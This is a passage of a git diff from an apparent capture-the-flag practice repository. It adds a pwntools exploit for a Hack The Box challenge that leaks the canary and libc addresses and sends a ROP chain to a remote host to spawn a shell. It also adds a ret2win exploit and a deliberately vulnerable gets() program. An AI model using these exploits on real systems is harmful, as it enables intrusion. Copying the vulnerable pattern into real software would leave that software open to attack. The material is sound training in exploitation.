rocks! Are you sure you want to buy it?" in leak[2][index_message:]: + p.sendline(b"no.") + log.debug(p.clean().decode()) + leak[2] = leak[2][:leak[2].find(b"\n\n")] + + return leak + + +with remote("167.99.85.216", 31511) as p: +#with process("./what_does_the_f_say_patched") as p: + leaks = [] + for i in range(8): + print(f"\rScanning {i*3}-{i*3+2}", end="") + leaks += scan_money(p, i * 3) + + print(leaks) + leaked_libc_addr = int(leaks[3], 16) + libc_base = leaked_libc_addr - 0x110191 + canary = int(leaks[13], 16) + leaked_binary_addr = int(leaks[15], 16) + binary_base = leaked_binary_addr - 0x174a + print(f"__GI___libc_read: {hex(leaked_libc_addr)}") + print(f"libc base: {hex(libc_base)}") + print(f"canary: {hex(canary)}") + print(f"leaked_binary_addr: {hex(leaked_binary_addr)}") + print(f"binary_base: {hex(binary_base)}") + p.sendline(b"1") + p.clean() + p.sendline(b"2") + p.clean() + p.sendline(b"1") + print(p.clean()) + execve_addr = libc_base + 0xe4e90 + puts_libc_addr = libc_base + 0x080a30 + bin_sh_string_addr = libc_base + 0x1b40fa + system_addr = libc_base + 0x04f4e0 + payload = b"\x90" * 0x18 + p64(canary) + p64(0xdeadbeefdeadbeef) + pop_rdi(binary_base, bin_sh_string_addr) + p64(binary_base + 0x1016) + p64(system_addr) + log.info(payload) + log.info(len(payload)) + p.sendline(payload) + p.interactive() diff --git a/htb/challenges/pwn/what_does_the_f_say/ld-2.27.so b/htb/challenges/pwn/what_does_the_f_say/ld-2.27.so new file mode 100755 index 0000000..a2e3b9a Binary files /dev/null and b/htb/challenges/pwn/what_does_the_f_say/ld-2.27.so differ diff --git a/htb/challenges/pwn/what_does_the_f_say/libc.so.6 b/htb/challenges/pwn/what_does_the_f_say/libc.so.6 new file mode 120000 index 0000000..cec5450 --- /dev/null +++ b/htb/challenges/pwn/what_does_the_f_say/libc.so.6 @@ -0,0 +1 @@ +libc6_2.27-3ubuntu1.2_amd64.so \ No newline at end of file diff --git a/htb/challenges/pwn/what_does_the_f_say/libc6_2.27-3ubuntu1.2_amd64.so b/htb/challenges/pwn/what_does_the_f_say/libc6_2.27-3ubuntu1.2_amd64.so new file mode 100644 index 0000000..5cb8ffa Binary files /dev/null and b/htb/challenges/pwn/what_does_the_f_say/libc6_2.27-3ubuntu1.2_amd64.so differ diff --git a/htb/challenges/pwn/what_does_the_f_say/what_does_the_f_say b/htb/challenges/pwn/what_does_the_f_say/what_does_the_f_say new file mode 100755 index 0000000..0609d9e Binary files /dev/null and b/htb/challenges/pwn/what_does_the_f_say/what_does_the_f_say differ diff --git a/htb/challenges/pwn/what_does_the_f_say/what_does_the_f_say_patched b/htb/challenges/pwn/what_does_the_f_say/what_does_the_f_say_patched new file mode 100755 index 0000000..6965572 Binary files /dev/null and b/htb/challenges/pwn/what_does_the_f_say/what_does_the_f_say_patched differ diff --git a/ir0nstone/ret2win/exploit.py b/ir0nstone/ret2win/exploit.py new file mode 100644 index 0000000..d3b7a46 --- /dev/null +++ b/ir0nstone/ret2win/exploit.py @@ -0,0 +1,14 @@ +from pwn import * + +p = process('./vuln') + +payload = b'A' * 52 +payload += p32(0x0804920f) + +log.info(p.clean()) + +pause() + +p.sendline(payload) + +log.info(p.clean()) diff --git a/ir0nstone/ret2win/vuln b/ir0nstone/ret2win/vuln new file mode 100755 index 0000000..336b0c3 Binary files /dev/null and b/ir0nstone/ret2win/vuln differ diff --git a/ir0nstone/ret2win/vuln.c b/ir0nstone/ret2win/vuln.c new file mode 100644 index 0000000..7fdef4d --- /dev/null +++ b/ir0nstone/ret2win/vuln.c @@ -0,0 +1,18 @@ +// gcc source.c -o vuln -no-pie -fno-stack-protector -z execstack -m32 + +#include + +void unsafe() { + char buffer[40]; + + puts("Overflow me"); + gets(buffer); +} + +void main() { + unsafe(); +} + +void flag() { + puts("Exploited!!!!!"); +}